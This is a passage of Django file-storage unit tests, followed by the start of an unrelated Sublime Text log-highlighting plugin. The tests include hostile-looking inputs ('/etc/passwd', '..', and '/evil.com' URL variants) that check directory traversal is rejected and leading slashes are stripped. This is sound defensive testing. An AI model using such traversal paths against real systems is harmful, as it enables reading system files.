        self.assertLess(abs(_dt - now_in_algiers), timedelta(seconds=2))
def test_file_get_accessed_time(self):
    """
    File storage returns a Datetime object for the last accessed time of
    a file.
    """
    self.assertFalse(self.storage.exists('test.file'))

    f = ContentFile('custom contents')
    f_name = self.storage.save('test.file', f)
    self.addCleanup(self.storage.delete, f_name)
    atime = self.storage.get_accessed_time(f_name)

    # Must agree with the filesystem atime and be recent.
    self.assertEqual(atime, datetime.fromtimestamp(os.path.getatime(self.storage.path(f_name))))
    self.assertLess(timezone.now() - self.storage.get_accessed_time(f_name), timedelta(seconds=2))
@requires_tz_support
def test_file_get_accessed_time_timezone(self):
    # Accessed time must honor USE_TZ / TIME_ZONE settings.
    self._test_file_time_getter(self.storage.get_accessed_time)
def test_file_get_created_time(self):
    """
    File storage returns a datetime for the creation time of a file.
    """
    self.assertFalse(self.storage.exists('test.file'))

    f = ContentFile('custom contents')
    f_name = self.storage.save('test.file', f)
    self.addCleanup(self.storage.delete, f_name)
    ctime = self.storage.get_created_time(f_name)

    # Must agree with the filesystem ctime and be recent.
    self.assertEqual(ctime, datetime.fromtimestamp(os.path.getctime(self.storage.path(f_name))))
    self.assertLess(timezone.now() - self.storage.get_created_time(f_name), timedelta(seconds=2))
@requires_tz_support
def test_file_get_created_time_timezone(self):
    # Created time must honor USE_TZ / TIME_ZONE settings.
    self._test_file_time_getter(self.storage.get_created_time)
def test_file_get_modified_time(self):
    """
    File storage returns a datetime for the last modified time of a file.
    """
    self.assertFalse(self.storage.exists('test.file'))

    f = ContentFile('custom contents')
    f_name = self.storage.save('test.file', f)
    self.addCleanup(self.storage.delete, f_name)
    mtime = self.storage.get_modified_time(f_name)

    # Must agree with the filesystem mtime and be recent.
    self.assertEqual(mtime, datetime.fromtimestamp(os.path.getmtime(self.storage.path(f_name))))
    self.assertLess(timezone.now() - self.storage.get_modified_time(f_name), timedelta(seconds=2))
@requires_tz_support
def test_file_get_modified_time_timezone(self):
    # Modified time must honor USE_TZ / TIME_ZONE settings.
    self._test_file_time_getter(self.storage.get_modified_time)
def test_file_save_without_name(self):
    """
    File storage extracts the filename from the content object if no
    name is given explicitly.
    """
    self.assertFalse(self.storage.exists('test.file'))

    f = ContentFile('custom contents')
    f.name = 'test.file'

    # Passing name=None falls back to the file object's own .name.
    storage_f_name = self.storage.save(None, f)

    self.assertEqual(storage_f_name, f.name)

    self.assertTrue(os.path.exists(os.path.join(self.temp_dir, f.name)))

    self.storage.delete(storage_f_name)
def test_file_save_with_path(self):
    """
    Saving a pathname should create intermediate directories as necessary.
    """
    self.assertFalse(self.storage.exists('path/to'))
    self.storage.save('path/to/test.file', ContentFile('file saved with path'))

    self.assertTrue(self.storage.exists('path/to'))
    # Default open mode is binary, hence the bytes comparison.
    with self.storage.open('path/to/test.file') as f:
        self.assertEqual(f.read(), b'file saved with path')

    self.assertTrue(os.path.exists(
        os.path.join(self.temp_dir, 'path', 'to', 'test.file')))

    self.storage.delete('path/to/test.file')
def test_save_doesnt_close(self):
    """Storage.save() must leave the uploaded file object open."""
    # Temporary (disk-backed) uploaded file.
    with TemporaryUploadedFile('test', 'text/plain', 1, 'utf8') as file:
        file.write(b'1')
        file.seek(0)
        self.assertFalse(file.closed)
        self.storage.save('path/to/test.file', file)
        self.assertFalse(file.closed)
        self.assertFalse(file.file.closed)

    # In-memory uploaded file.
    file = InMemoryUploadedFile(StringIO('1'), '', 'test', 'text/plain', 1, 'utf8')
    with file:
        self.assertFalse(file.closed)
        self.storage.save('path/to/test.file', file)
        self.assertFalse(file.closed)
        self.assertFalse(file.file.closed)
def test_file_path(self):
    """
    File storage returns the full path of a file
    """
    self.assertFalse(self.storage.exists('test.file'))

    f = ContentFile('custom contents')
    f_name = self.storage.save('test.file', f)

    # path() is the saved name joined onto the storage location.
    self.assertEqual(self.storage.path(f_name), os.path.join(self.temp_dir, f_name))

    self.storage.delete(f_name)
def test_file_url(self):
    """
    File storage returns a url to access a given file from the Web.
    """
    self.assertEqual(self.storage.url('test.file'), self.storage.base_url + 'test.file')

    # should encode special chars except ~!*()'
    # like encodeURIComponent() JavaScript function do
    self.assertEqual(
        self.storage.url(r"~!*()'@#$%^&*abc`+ =.file"),
        "/test_media_url/~!*()'%40%23%24%25%5E%26*abc%60%2B%20%3D.file"
    )
    # NUL bytes are percent-encoded too, not rejected.
    self.assertEqual(self.storage.url("ab\0c"), "/test_media_url/ab%00c")

    # should translate os path separator(s) to the url path separator
    self.assertEqual(self.storage.url("""a/b\\c.file"""), "/test_media_url/a/b/c.file")

    # #25905: remove leading slashes from file names to prevent unsafe url output
    self.assertEqual(self.storage.url("/evil.com"), "/test_media_url/evil.com")
    self.assertEqual(self.storage.url(r"\evil.com"), "/test_media_url/evil.com")
    self.assertEqual(self.storage.url("///evil.com"), "/test_media_url/evil.com")
    self.assertEqual(self.storage.url(r"\\\evil.com"), "/test_media_url/evil.com")

    # No name yields the bare base URL.
    self.assertEqual(self.storage.url(None), "/test_media_url/")
def test_base_url(self):
    """
    File storage returns a url even when its base_url is unset or modified.
    """
    # An unset base_url makes url() unusable and must raise.
    self.storage.base_url = None
    with self.assertRaises(ValueError):
        self.storage.url('test.file')

    # #22717: missing ending slash in base_url should be auto-corrected
    storage = self.storage_class(location=self.temp_dir, base_url='/no_ending_slash')
    self.assertEqual(
        storage.url('test.file'),
        '%s%s' % (storage.base_url, 'test.file')
    )
def test_listdir(self):
    """
    File storage returns a tuple containing directories and files.
    """
    self.assertFalse(self.storage.exists('storage_test_1'))
    self.assertFalse(self.storage.exists('storage_test_2'))
    self.assertFalse(self.storage.exists('storage_dir_1'))

    # Two files and one directory at the storage root.
    self.storage.save('storage_test_1', ContentFile('custom content'))
    self.storage.save('storage_test_2', ContentFile('custom content'))
    os.mkdir(os.path.join(self.temp_dir, 'storage_dir_1'))

    # listdir('') lists the root; order is unspecified, hence the sets.
    dirs, files = self.storage.listdir('')
    self.assertEqual(set(dirs), {'storage_dir_1'})
    self.assertEqual(set(files), {'storage_test_1', 'storage_test_2'})

    self.storage.delete('storage_test_1')
    self.storage.delete('storage_test_2')
    os.rmdir(os.path.join(self.temp_dir, 'storage_dir_1'))
def test_file_storage_prevents_directory_traversal(self):
    """
    File storage prevents directory traversal (files can only be accessed if
    they're below the storage location).
    """
    # Both relative ('..') and absolute paths outside the storage root
    # must be rejected.
    with self.assertRaises(SuspiciousOperation):
        self.storage.exists('..')
    with self.assertRaises(SuspiciousOperation):
        self.storage.exists('/etc/passwd')
def test_file_storage_preserves_filename_case(self):
    """The storage backend should preserve case of filenames."""
    # Create a storage backend associated with the mixed case name
    # directory.
    other_temp_storage = self.storage_class(location=self.temp_dir2)
    # Ask that storage backend to store a file with a mixed case filename.
    mixed_case = 'CaSe_SeNsItIvE'
    file = other_temp_storage.open(mixed_case, 'w')
    file.write('storage contents')
    file.close()
    # path() must echo the name back with its original casing.
    self.assertEqual(os.path.join(self.temp_dir2, mixed_case), other_temp_storage.path(mixed_case))
    other_temp_storage.delete(mixed_case)
def test_makedirs_race_handling(self):
    """
    File storage should be robust against directory creation race conditions.
    """
    real_makedirs = os.makedirs

    # Monkey-patch os.makedirs, to simulate a normal call, a raced call,
    # and an error.
    def fake_makedirs(path):
        if path == os.path.join(self.temp_dir, 'normal'):
            real_makedirs(path)
        elif path == os.path.join(self.temp_dir, 'raced'):
            # Directory appears, then a concurrent actor seems to race us.
            real_makedirs(path)
            raise FileNotFoundError()
        elif path == os.path.join(self.temp_dir, 'error'):
            raise FileExistsError()
        else:
            self.fail('unexpected argument %r' % path)

    try:
        os.makedirs = fake_makedirs

        self.storage.save('normal/test.file', ContentFile('saved normally'))
        with self.storage.open('normal/test.file') as f:
            self.assertEqual(f.read(), b'saved normally')

        # The raced FileNotFoundError must be swallowed by the storage.
        self.storage.save('raced/test.file', ContentFile('saved with race'))
        with self.storage.open('raced/test.file') as f:
            self.assertEqual(f.read(), b'saved with race')

        # Exceptions aside from FileNotFoundError are raised.
        with self.assertRaises(FileExistsError):
            self.storage.save('error/test.file', ContentFile('not saved'))
    finally:
        os.makedirs = real_makedirs
def test_remove_race_handling(self):
    """
    File storage should be robust against file removal race conditions.
    """
    real_remove = os.remove

    # Monkey-patch os.remove, to simulate a normal call, a raced call,
    # and an error.
    def fake_remove(path):
        if path == os.path.join(self.temp_dir, 'normal.file'):
            real_remove(path)
        elif path == os.path.join(self.temp_dir, 'raced.file'):
            # File vanishes as if a concurrent actor deleted it first.
            real_remove(path)
            raise FileNotFoundError()
        elif path == os.path.join(self.temp_dir, 'error.file'):
            raise PermissionError()
        else:
            self.fail('unexpected argument %r' % path)

    try:
        os.remove = fake_remove

        self.storage.save('normal.file', ContentFile('delete normally'))
        self.storage.delete('normal.file')
        self.assertFalse(self.storage.exists('normal.file'))

        self.storage.save('raced.file', ContentFile('delete with race'))
        self.storage.delete('raced.file')
        # BUG FIX: assert on 'raced.file' (the file just deleted); the old
        # check re-tested 'normal.file', letting a raced-delete failure
        # slip through unnoticed.
        self.assertFalse(self.storage.exists('raced.file'))

        # Exceptions aside from FileNotFoundError are raised.
        self.storage.save('error.file', ContentFile('delete with error'))
        with self.assertRaises(PermissionError):
            self.storage.delete('error.file')
    finally:
        os.remove = real_remove
def test_file_chunks_error(self):
    """
    Test behavior when file.chunks() is raising an error
    """
    broken = ContentFile('chunks fails')
    def failing_chunks():
        raise IOError
    # Replace chunks() so the save loop hits the error immediately.
    broken.chunks = failing_chunks
    with self.assertRaises(IOError):
        self.storage.save('error.file', broken)
def test_delete_no_name(self):
    """
    Calling delete with an empty name should not try to remove the base
    storage directory, but fail loudly (#20660).
    """
    with self.assertRaises(AssertionError):
        self.storage.delete('')
def test_delete_deletes_directories(self):
    """delete() removes directories as well as regular files."""
    doomed_dir = tempfile.mkdtemp(dir=self.storage.location)
    self.storage.delete(doomed_dir)
    self.assertFalse(os.path.exists(doomed_dir))
@override_settings(
    MEDIA_ROOT='media_root',
    MEDIA_URL='media_url/',
    FILE_UPLOAD_PERMISSIONS=0o777,
    FILE_UPLOAD_DIRECTORY_PERMISSIONS=0o777,
)
def test_setting_changed(self):
    """
    Properties using settings values as defaults should be updated on
    referenced settings change while specified values should be unchanged.
    """
    # Storage with every option given explicitly: must ignore setting
    # overrides below.
    storage = self.storage_class(
        location='explicit_location',
        base_url='explicit_base_url/',
        file_permissions_mode=0o666,
        directory_permissions_mode=0o666,
    )
    # Storage relying entirely on settings-derived defaults.
    defaults_storage = self.storage_class()
    settings = {
        'MEDIA_ROOT': 'overriden_media_root',
        'MEDIA_URL': 'overriden_media_url/',
        'FILE_UPLOAD_PERMISSIONS': 0o333,
        'FILE_UPLOAD_DIRECTORY_PERMISSIONS': 0o333,
    }
    with self.settings(**settings):
        # Explicit values are untouched by the override.
        self.assertEqual(storage.base_location, 'explicit_location')
        self.assertIn('explicit_location', storage.location)
        self.assertEqual(storage.base_url, 'explicit_base_url/')
        self.assertEqual(storage.file_permissions_mode, 0o666)
        self.assertEqual(storage.directory_permissions_mode, 0o666)
        # Defaulted values track the overridden settings.
        self.assertEqual(defaults_storage.base_location, settings['MEDIA_ROOT'])
        self.assertIn(settings['MEDIA_ROOT'], defaults_storage.location)
        self.assertEqual(defaults_storage.base_url, settings['MEDIA_URL'])
        self.assertEqual(defaults_storage.file_permissions_mode, settings['FILE_UPLOAD_PERMISSIONS'])
        self.assertEqual(
            defaults_storage.directory_permissions_mode, settings['FILE_UPLOAD_DIRECTORY_PERMISSIONS']
        )
class CustomStorage(FileSystemStorage):
    def get_available_name(self, name, max_length=None):
        """
        Append numbers to duplicate files rather than underscores, like Trac.
        """
        # Split once: everything after the first dot is treated as the
        # (possibly multi-part) extension.
        pieces = name.split('.')
        stem, suffixes = pieces[0], pieces[1:]
        counter = 2
        while self.exists(name):
            name = '.'.join([stem, str(counter)] + suffixes)
            counter += 1
        return name
class CustomStorageTests(FileStorageTests):
    storage_class = CustomStorage

    def test_custom_get_available_name(self):
        """Duplicate saves get '.2', '.3', ... suffixes instead of '_xxx'."""
        initial = self.storage.save('custom_storage', ContentFile('custom contents'))
        self.assertEqual(initial, 'custom_storage')
        duplicate = self.storage.save('custom_storage', ContentFile('more contents'))
        self.assertEqual(duplicate, 'custom_storage.2')
        self.storage.delete(initial)
        self.storage.delete(duplicate)
class DiscardingFalseContentStorage(FileSystemStorage):
    def _save(self, name, content):
        """Store only truthy content; silently drop falsy content."""
        if not content:
            return ''
        return super()._save(name, content)
class DiscardingFalseContentStorageTests(FileStorageTests):
    storage_class = DiscardingFalseContentStorage

    def test_custom_storage_discarding_empty_content(self):
        """
        When Storage.save() wraps a file-like object in File, it should include
        the name argument so that bool(file) evaluates to True (#26495).
        """
        stream = StringIO('content')
        self.storage.save('tests/stringio', stream)
        self.assertTrue(self.storage.exists('tests/stringio'))
        with self.storage.open('tests/stringio') as stored:
            self.assertEqual(stored.read(), b'content')
class FileFieldStorageTests(TestCase):
    """Exercise FileField behavior backed by the module-level temp_storage."""

    def tearDown(self):
        # Each test re-creates files under temp_storage_location; wipe it.
        shutil.rmtree(temp_storage_location)

    def _storage_max_filename_length(self, storage):
        """
        Query filesystem for maximum filename length (e.g. AUFS has 242).
        """
        dir_to_test = storage.location
        # Walk up to the nearest existing directory before asking pathconf.
        while not os.path.exists(dir_to_test):
            dir_to_test = os.path.dirname(dir_to_test)
        try:
            return os.pathconf(dir_to_test, 'PC_NAME_MAX')
        except Exception:
            return 255  # Should be safe on most backends

    def test_files(self):
        self.assertIsInstance(Storage.normal, FileDescriptor)
        # An object without a file has limited functionality.
        obj1 = Storage()
        self.assertEqual(obj1.normal.name, "")
        with self.assertRaises(ValueError):
            obj1.normal.size
        # Saving a file enables full functionality.
        obj1.normal.save("django_test.txt", ContentFile("content"))
        self.assertEqual(obj1.normal.name, "tests/django_test.txt")
        self.assertEqual(obj1.normal.size, 7)
        self.assertEqual(obj1.normal.read(), b"content")
        obj1.normal.close()
        # File objects can be assigned to FileField attributes, but shouldn't
        # get committed until the model it's attached to is saved.
        obj1.normal = SimpleUploadedFile("assignment.txt", b"content")
        dirs, files = temp_storage.listdir("tests")
        self.assertEqual(dirs, [])
        self.assertNotIn("assignment.txt", files)
        obj1.save()
        dirs, files = temp_storage.listdir("tests")
        self.assertEqual(sorted(files), ["assignment.txt", "django_test.txt"])
        # Save another file with the same name.
        obj2 = Storage()
        obj2.normal.save("django_test.txt", ContentFile("more content"))
        obj2_name = obj2.normal.name
        self.assertRegex(obj2_name, "tests/django_test_%s.txt" % FILE_SUFFIX_REGEX)
        self.assertEqual(obj2.normal.size, 12)
        obj2.normal.close()
        # Deleting an object does not delete the file it uses.
        obj2.delete()
        obj2.normal.save("django_test.txt", ContentFile("more content"))
        self.assertNotEqual(obj2_name, obj2.normal.name)
        self.assertRegex(obj2.normal.name, "tests/django_test_%s.txt" % FILE_SUFFIX_REGEX)
        obj2.normal.close()

    def test_filefield_read(self):
        # Files can be read in a little at a time, if necessary.
        obj = Storage.objects.create(
            normal=SimpleUploadedFile("assignment.txt", b"content"))
        obj.normal.open()
        self.assertEqual(obj.normal.read(3), b"con")
        self.assertEqual(obj.normal.read(), b"tent")
        self.assertEqual(list(obj.normal.chunks(chunk_size=2)), [b"co", b"nt", b"en", b"t"])
        obj.normal.close()

    def test_filefield_write(self):
        # Files can be written to.
        obj = Storage.objects.create(normal=SimpleUploadedFile('rewritten.txt', b'content'))
        with obj.normal as normal:
            normal.open('wb')
            normal.write(b'updated')
        obj.refresh_from_db()
        self.assertEqual(obj.normal.read(), b'updated')
        obj.normal.close()

    def test_filefield_reopen(self):
        # Re-opening a closed FileField file must work (and seek from 0).
        obj = Storage.objects.create(normal=SimpleUploadedFile('reopen.txt', b'content'))
        with obj.normal as normal:
            normal.open()
        obj.normal.open()
        obj.normal.file.seek(0)
        obj.normal.close()

    def test_duplicate_filename(self):
        # Multiple files with the same name get _(7 random chars) appended to them.
        objs = [Storage() for i in range(2)]
        for o in objs:
            o.normal.save("multiple_files.txt", ContentFile("Same Content"))
        try:
            names = [o.normal.name for o in objs]
            self.assertEqual(names[0], "tests/multiple_files.txt")
            self.assertRegex(names[1], "tests/multiple_files_%s.txt" % FILE_SUFFIX_REGEX)
        finally:
            for o in objs:
                o.delete()

    def test_file_truncation(self):
        # Given the max_length is limited, when multiple files get uploaded
        # under the same name, then the filename get truncated in order to fit
        # in _(7 random chars). When most of the max_length is taken by
        # dirname + extension and there are not enough characters in the
        # filename to truncate, an exception should be raised.
        objs = [Storage() for i in range(2)]
        filename = 'filename.ext'
        for o in objs:
            o.limited_length.save(filename, ContentFile('Same Content'))
        try:
            # Testing truncation.
            names = [o.limited_length.name for o in objs]
            self.assertEqual(names[0], 'tests/%s' % filename)
            self.assertRegex(names[1], 'tests/fi_%s.ext' % FILE_SUFFIX_REGEX)
            # Testing exception is raised when filename is too short to truncate.
            filename = 'short.longext'
            objs[0].limited_length.save(filename, ContentFile('Same Content'))
            with self.assertRaisesMessage(SuspiciousFileOperation, 'Storage can not find an available filename'):
                objs[1].limited_length.save(*(filename, ContentFile('Same Content')))
        finally:
            for o in objs:
                o.delete()

    @unittest.skipIf(
        sys.platform.startswith('win'),
        "Windows supports at most 260 characters in a path.",
    )
    def test_extended_length_storage(self):
        # Testing FileField with max_length > 255. Most systems have filename
        # length limitation of 255. Path takes extra chars.
        filename = (self._storage_max_filename_length(temp_storage) - 4) * 'a'  # 4 chars for extension.
        obj = Storage()
        obj.extended_length.save('%s.txt' % filename, ContentFile('Same Content'))
        self.assertEqual(obj.extended_length.name, 'tests/%s.txt' % filename)
        self.assertEqual(obj.extended_length.read(), b'Same Content')
        obj.extended_length.close()

    def test_filefield_default(self):
        # Default values allow an object to access a single file.
        temp_storage.save('tests/default.txt', ContentFile('default content'))
        obj = Storage.objects.create()
        self.assertEqual(obj.default.name, "tests/default.txt")
        self.assertEqual(obj.default.read(), b"default content")
        obj.default.close()
        # But it shouldn't be deleted, even if there are no more objects using
        # it.
        obj.delete()
        obj = Storage()
        self.assertEqual(obj.default.read(), b"default content")
        obj.default.close()

    def test_empty_upload_to(self):
        # upload_to can be empty, meaning it does not use subdirectory.
        obj = Storage()
        obj.empty.save('django_test.txt', ContentFile('more content'))
        self.assertEqual(obj.empty.name, "django_test.txt")
        self.assertEqual(obj.empty.read(), b"more content")
        obj.empty.close()

    def test_random_upload_to(self):
        # Verify the fix for #5655, making sure the directory is only
        # determined once.
        obj = Storage()
        obj.random.save("random_file", ContentFile("random content"))
        self.assertTrue(obj.random.name.endswith("/random_file"))
        obj.random.close()

    def test_custom_valid_name_callable_upload_to(self):
        """
        Storage.get_valid_name() should be called when upload_to is a callable.
        """
        obj = Storage()
        obj.custom_valid_name.save("random_file", ContentFile("random content"))
        # CustomValidNameStorage.get_valid_name() appends '_valid' to the name
        self.assertTrue(obj.custom_valid_name.name.endswith("/random_file_valid"))
        obj.custom_valid_name.close()

    def test_filefield_pickling(self):
        # Push an object into the cache to make sure it pickles properly
        obj = Storage()
        obj.normal.save("django_test.txt", ContentFile("more content"))
        obj.normal.close()
        cache.set("obj", obj)
        self.assertEqual(cache.get("obj").normal.name, "tests/django_test.txt")

    def test_file_object(self):
        # Create sample file
        temp_storage.save('tests/example.txt', ContentFile('some content'))
        # Load it as python file object
        with open(temp_storage.path('tests/example.txt')) as file_obj:
            # Save it using storage and read its content
            temp_storage.save('tests/file_obj', file_obj)
        self.assertTrue(temp_storage.exists('tests/file_obj'))
        with temp_storage.open('tests/file_obj') as f:
            self.assertEqual(f.read(), b'some content')

    def test_stringio(self):
        # Test passing StringIO instance as content argument to save
        output = StringIO()
        output.write('content')
        output.seek(0)
        # Save it and read written file
        temp_storage.save('tests/stringio', output)
        self.assertTrue(temp_storage.exists('tests/stringio'))
        with temp_storage.open('tests/stringio') as f:
            self.assertEqual(f.read(), b'content')
# Tests for a race condition on file saving (#4948).
# This is written in such a way that it'll always pass on platforms
# without threading.
class SlowFile(ContentFile):
    # Delay chunk reads so two concurrent saves of the same name overlap,
    # exercising the storage's available-name race handling.
    def chunks(self):
        time.sleep(1)
        return super().chunks()
class FileSaveRaceConditionTest(SimpleTestCase):
    """Regression test for #4948: two concurrent saves under the same name."""

    def setUp(self):
        self.storage_dir = tempfile.mkdtemp()
        self.storage = FileSystemStorage(self.storage_dir)
        # Second saver; runs concurrently with the main-thread save below.
        self.thread = threading.Thread(target=self.save_file, args=['conflict'])

    def tearDown(self):
        shutil.rmtree(self.storage_dir)

    def save_file(self, name):
        name = self.storage.save(name, SlowFile(b"Data"))

    def test_race_condition(self):
        self.thread.start()
        self.save_file('conflict')
        self.thread.join()
        files = sorted(os.listdir(self.storage_dir))
        # One save keeps the plain name; the other gets a random suffix.
        self.assertEqual(files[0], 'conflict')
        self.assertRegex(files[1], 'conflict_%s' % FILE_SUFFIX_REGEX)
@unittest.skipIf(sys.platform.startswith('win'), "Windows only partially supports umasks and chmod.")
class FileStoragePermissions(unittest.TestCase):
    """Check FILE_UPLOAD_* permission settings against a fixed umask."""

    def setUp(self):
        # Pin the umask so default-permission expectations are deterministic.
        self.umask = 0o027
        self.old_umask = os.umask(self.umask)
        self.storage_dir = tempfile.mkdtemp()

    def tearDown(self):
        shutil.rmtree(self.storage_dir)
        os.umask(self.old_umask)

    @override_settings(FILE_UPLOAD_PERMISSIONS=0o654)
    def test_file_upload_permissions(self):
        self.storage = FileSystemStorage(self.storage_dir)
        name = self.storage.save("the_file", ContentFile("data"))
        actual_mode = os.stat(self.storage.path(name))[0] & 0o777
        self.assertEqual(actual_mode, 0o654)

    @override_settings(FILE_UPLOAD_PERMISSIONS=None)
    def test_file_upload_default_permissions(self):
        self.storage = FileSystemStorage(self.storage_dir)
        fname = self.storage.save("some_file", ContentFile("data"))
        mode = os.stat(self.storage.path(fname))[0] & 0o777
        # With no explicit setting, the mode follows the process umask.
        self.assertEqual(mode, 0o666 & ~self.umask)

    @override_settings(FILE_UPLOAD_DIRECTORY_PERMISSIONS=0o765)
    def test_file_upload_directory_permissions(self):
        self.storage = FileSystemStorage(self.storage_dir)
        name = self.storage.save("the_directory/the_file", ContentFile("data"))
        dir_mode = os.stat(os.path.dirname(self.storage.path(name)))[0] & 0o777
        self.assertEqual(dir_mode, 0o765)

    @override_settings(FILE_UPLOAD_DIRECTORY_PERMISSIONS=None)
    def test_file_upload_directory_default_permissions(self):
        self.storage = FileSystemStorage(self.storage_dir)
        name = self.storage.save("the_directory/the_file", ContentFile("data"))
        dir_mode = os.stat(os.path.dirname(self.storage.path(name)))[0] & 0o777
        self.assertEqual(dir_mode, 0o777 & ~self.umask)
class FileStoragePathParsing(SimpleTestCase):
    """Filename mangling must apply to the file part, not the directory."""

    def setUp(self):
        self.storage_dir = tempfile.mkdtemp()
        self.storage = FileSystemStorage(self.storage_dir)

    def tearDown(self):
        shutil.rmtree(self.storage_dir)

    def test_directory_with_dot(self):
        """Regression test for #9610.
        If the directory name contains a dot and the file name doesn't, make
        sure we still mangle the file name instead of the directory name.
        """
        self.storage.save('dotted.path/test', ContentFile("1"))
        self.storage.save('dotted.path/test', ContentFile("2"))
        files = sorted(os.listdir(os.path.join(self.storage_dir, 'dotted.path')))
        # The directory itself must not have been renamed.
        self.assertFalse(os.path.exists(os.path.join(self.storage_dir, 'dotted_.path')))
        self.assertEqual(files[0], 'test')
        self.assertRegex(files[1], 'test_%s' % FILE_SUFFIX_REGEX)

    def test_first_character_dot(self):
        """
        File names with a dot as their first character don't have an extension,
        and the underscore should get added to the end.
        """
        self.storage.save('dotted.path/.test', ContentFile("1"))
        self.storage.save('dotted.path/.test', ContentFile("2"))
        files = sorted(os.listdir(os.path.join(self.storage_dir, 'dotted.path')))
        self.assertFalse(os.path.exists(os.path.join(self.storage_dir, 'dotted_.path')))
        self.assertEqual(files[0], '.test')
        self.assertRegex(files[1], '.test_%s' % FILE_SUFFIX_REGEX)
class ContentFileStorageTestCase(unittest.TestCase):
    def setUp(self):
        self.storage_dir = tempfile.mkdtemp()
        self.storage = FileSystemStorage(self.storage_dir)

    def tearDown(self):
        shutil.rmtree(self.storage_dir)

    def test_content_saving(self):
        """
        ContentFile can be saved correctly with the filesystem storage,
        if it was initialized with either bytes or unicode content.
        """
        for name, payload in (('bytes.txt', ContentFile(b"content")),
                              ('unicode.txt', ContentFile("español"))):
            self.storage.save(name, payload)
@override_settings(ROOT_URLCONF='file_storage.urls')
class FileLikeObjectTestCase(LiveServerTestCase):
    """
    Test file-like objects (#15644).
    """
    available_apps = []

    def setUp(self):
        self.temp_dir = tempfile.mkdtemp()
        self.storage = FileSystemStorage(location=self.temp_dir)

    def tearDown(self):
        shutil.rmtree(self.temp_dir)

    def test_urllib2_urlopen(self):
        """
        Test the File storage API with a file like object coming from urllib2.urlopen()
        """
        file_like_object = urlopen(self.live_server_url + '/')
        f = File(file_like_object)
        stored_filename = self.storage.save("remote_file.html", f)
        # Fetch the page again; the stored copy must match the live response.
        remote_file = urlopen(self.live_server_url + '/')
        with self.storage.open(stored_filename) as stored_file:
            self.assertEqual(stored_file.read(), remote_file.read())
|
logviewplus.py | import sublime, sublime_plugin
import threading
import unicodedata
class StatusAnimation:
    """Animated '...' indicator shown in a Sublime Text view's status bar.

    NOTE(review): all of the attributes below are class attributes, so
    their state is shared by every instance — presumably only one
    animation runs at a time; confirm before running several concurrently.
    """
    animation = [ "... ", " ... ", " ...", " ... "]
    animationPos = 0
    stopFlag = False
    view = None
    key = None
    updateLock = threading.RLock()

    def updateAnimation(self):
        # Timer callback: draw the next frame, or drop the view/key
        # references once stop() has been requested.
        if (self.stopFlag):
            self.view = None
            self.key = None
        else:
            with self.updateLock:
                # Re-check under the lock: stop() may have run since the
                # unguarded test above.
                if (self.stopFlag == False):
                    self.view.set_status(self.key, self.prefix + self.animation[self.animationPos])
                    self.animationPos += 1
                    if (self.animationPos >= len(self.animation)): self.animationPos = 0
            # Re-arm the timer; the next tick performs cleanup if stopped.
            sublime.set_timeout(self.updateAnimation, 500)

    def start(self, view, prefix, delay, key):
        # Show the first animation step and wait for the given time before starting the animation
        view.set_status(key, prefix + self.animation[0])
        self.animationPos = 1
        self.stopFlag = False
        self.view = view
        self.key = key
        self.prefix = prefix
        sublime.set_timeout(self.updateAnimation, delay)

    def stop(self):
        # Taking the lock prevents a concurrent updateAnimation() from
        # re-drawing the status after it has been erased here.
        with self.updateLock:
            self.stopFlag = True
            self.view.erase_status(self.key)
class LogViewPlus:
    """Highlights error/warning/mark lines in a log view and maintains
    per-category match counters in the status bar."""

    # Map of user-facing highlight style names to add_regions() flags.
    regionStyles = {
        "fill": 0,
        "outline": sublime.DRAW_NO_FILL,
        "underline": sublime.DRAW_NO_FILL | sublime.DRAW_NO_OUTLINE | sublime.DRAW_SOLID_UNDERLINE,
        "none": sublime.DRAW_NO_FILL | sublime.DRAW_NO_OUTLINE
    }
    # Lookarounds wrapped around user filters to force whole-word matches.
    regexPrefix = "(?<![\\w])("
    regexSuffix = ")(?![\\w])"

    def highlight(self, view, regex, regionName, scope, icon, regionFlags):
        """Mark every line matching 'regex'; return the marked line regions."""
        if (regex == "") or (regex == None):
            return []
        foundRegions = view.find_all(regex, sublime.IGNORECASE, None, None)
        numFoundRegions = len(foundRegions)
        if (numFoundRegions > 0):
            # Expand all regions to match the whole line and mark the line with the given scope
            for i in range(0, numFoundRegions):
                foundRegions[i] = view.line(foundRegions[i])
            view.add_regions(regionName, foundRegions, scope, "Packages/LogViewPlus/" + icon + ".png", regionFlags);
        return foundRegions

    def markupView(self, view, statusAnimation):
        """Worker-thread entry point: run all three highlight passes, set
        the per-category status counters, then stop the animation."""
        settings = sublime.load_settings("logviewplus.sublime-settings")
        errorRegex = settings.get("error_filter", "error|fail|exception")
        errorScope = settings.get("error_scope", "markup.deleted")
        errorStatusCaption = settings.get("error_status_caption", "Errors")
        warningRegex = settings.get("warning_filter", "warning|not found|defer(ed)?")
        warningScope = settings.get("warning_scope", "markup.changed")
        warningStatusCaption = settings.get("warning_status_caption", "Warnings")
        markRegex = settings.get("mark_filter", "start(ing|ed)?|quit|end|shut(ing)? down")
        markScope = settings.get("mark_scope", "markup.inserted")
        markStatusCaption = settings.get("mark_status_caption", "Marks")
        highlighStyle = settings.get("highlight_style", "underline")
        autoMatchWords = settings.get("auto_match_words", True)
        # If auto_match_words is set to true, extend the regular expressions with lookarounds to only match words.
        if (autoMatchWords):
            errorRegex = self.regexPrefix + errorRegex + self.regexSuffix
            warningRegex = self.regexPrefix + warningRegex + self.regexSuffix
            markRegex = self.regexPrefix + markRegex + self.regexSuffix
        # Determine the flags to set on the region for correct highlighting
        if (highlighStyle in self.regionStyles):
            regionFlags = self.regionStyles[highlighStyle]
        else:
            regionFlags = self.regionStyles["outline"]
        foundRegions = self.highlight(view, markRegex, "logfile.marks", markScope, "mark", regionFlags)
        view.set_status("logviewplus.2", markStatusCaption + " " + str(len(foundRegions)))
        bookmarks = foundRegions
        foundRegions = self.highlight(view, warningRegex, "logfile.warnings", warningScope, "warning", regionFlags)
        view.set_status("logviewplus.1", warningStatusCaption + " " + str(len(foundRegions)))
        bookmarks += foundRegions
        foundRegions = self.highlight(view, errorRegex, "logfile.errors", errorScope, "error", regionFlags)
        view.set_status("logviewplus.0", errorStatusCaption + " " + str(len(foundRegions)))
        bookmarks += foundRegions
        del foundRegions
        # Set a bookmark for each region
        view.add_regions("bookmarks", bookmarks, "bookmarks", "", sublime.HIDDEN);
        del bookmarks
        # Stop the animation
        statusAnimation.stop()
        statusAnimation = None
        # Set the final message
        sublime.status_message("")

    # Called to prepare the view:
    # Makes it read only and applies the highlighting
    def prepareView(self, view):
        # view.set_read_only(True)
        # view.set_status("logviewplus", "read-only")
        # Set a temporary message
